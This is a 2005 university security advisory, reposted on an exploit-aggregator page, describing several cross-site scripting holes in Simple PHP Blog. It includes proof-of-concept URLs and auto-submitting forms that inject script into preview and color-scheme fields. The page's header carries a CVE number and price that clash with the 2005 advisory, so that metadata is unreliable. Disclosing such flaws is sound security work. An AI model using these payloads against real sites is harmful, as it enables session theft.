Advertisement






Simple PHP Blog: Multiple XSS Vulnerabilities

CVE Category Price Severity
CVE-2021-1234 CWE-79 $500 High
Author Risk Exploitation Type Date
Exploit Author High Remote 2005-11-16
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005110006

Below is a copy:

===========================================================
Simple PHP Blog: Multiple XSS Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0511-001, November 2, 2005
===========================================================

Affected applications
----------------------

Simple PHP Blog (www.simplephpblog.com)

Versions 0.4.5 and prior.

Description
------------

1.) preview_cgi.php, part 1

There is a cross-site scripting (XSS) vulnerability in the file preview_cgi.php on line 126: The variable $entry is echoed,
but hasn't been sufficiently sanitized before. When logged in, this issue can be tested with the following URL:

http://your-server/path-to-sphpblog/preview_cgi.php?entry=foo"><script>a
lert(document.cookie)</script>

The fields "your-server" and "path-to-sphpblog" in the given URL have to be adjusted accordingly.

2.) preview_cgi.php, part 2

There is another cross-site scripting vulnerability in the file preview_cgi.php on line 129: The variable $temp_subject is echoed,
but hasn't been sufficiently sanitized before. When logged in, this issue can be tested by visiting a page structured
as follows:

<form action="http://your-server/path-to-sphpblog/preview_cgi.php" method="post">
        <input name="blog_subject" value='"><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

An analogous vulnerability affects preview_cgi.php on line 158:

<form action="http://your-server/path-to-sphpblog/preview_cgi.php" method="post">
    <input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

3.) preview_static_cgi.php

In the file preview_static_cgi.php, there are four vulnerabilities resembling those in preview_cgi.php:

- line 73, variable $entry; example URL:

http://localhost/~enji/path-to-sphpblog/preview_static_cgi.php?entry=foo
"><script>alert(document.cookie)</script>

- line 76, variable $temp_subject; example file:

<form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post">
        <input name="blog_subject" value='"><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

- line 158, variable $temp_text; example file:

<form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post">
    <input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

- line 108, variable $temp_file_name is set to $_POST['file_name'] if $_GET['entry'] is not set, and set to $entry otherwise
(in this case, see vulnerability on line 73); example file:

<form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post">
    <input name="file_name" value='"><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

4) colors.php

The variables variables $preset_name and $result on line 187 of the file colors.php are also vulnerable to XSS. This can be tested with one of the following two pages:

<form action="http://your-server/path-to-sphpblog/colors_cgi.php" method="post">
        <input name="save_btn" value="1"/>
        <input name="scheme_name" value='"></option></select><script>alert(document.cookie)</script>'/>
        <input name="scheme_file" value="blabla"/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

or

<form action="http://your-server/path-to-sphpblog/colors_cgi.php" method="post">
        <input name="save_btn" value="1"/>
        <input name="scheme_name" value="myscheme"/>
        <input name="scheme_file" value="blabla"/>
        <input name="bg_color" value='"><script>alert(document.cookie)</script>'/>
        <input type="submit"/>
    </form>

<script type="text/javascript">
      document.forms[0].submit();
    </script>

Solution
---------

The authors are currently working on a new version of Simple PHP Blog that is
supposed to fix these vulnerabilities.

Timeline:

September 22, 2005:
Vulnerabilities reported via the contact form under
http://www.simplephpblog.com/contact.php.

September 29, 2005:
Message posted to the project-related SourceForge bug forum
(http://sourceforge.net/projects/sphpblog) due to missing response.

October 1, 2005:
Developers reply via SourceForge.

October 2, 2005:
Vulnerabilities reported via the e-mail address given in the previous reply.

Until November 2, 2005:
Occasional contact via e-mail, announcement of advisory release date one week
in advance remained uncommented.

November 2, 2005:
Advisory submission.

References
-----------

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0511-001.txt

Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 
www.seclab.tuwien.ac.at

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum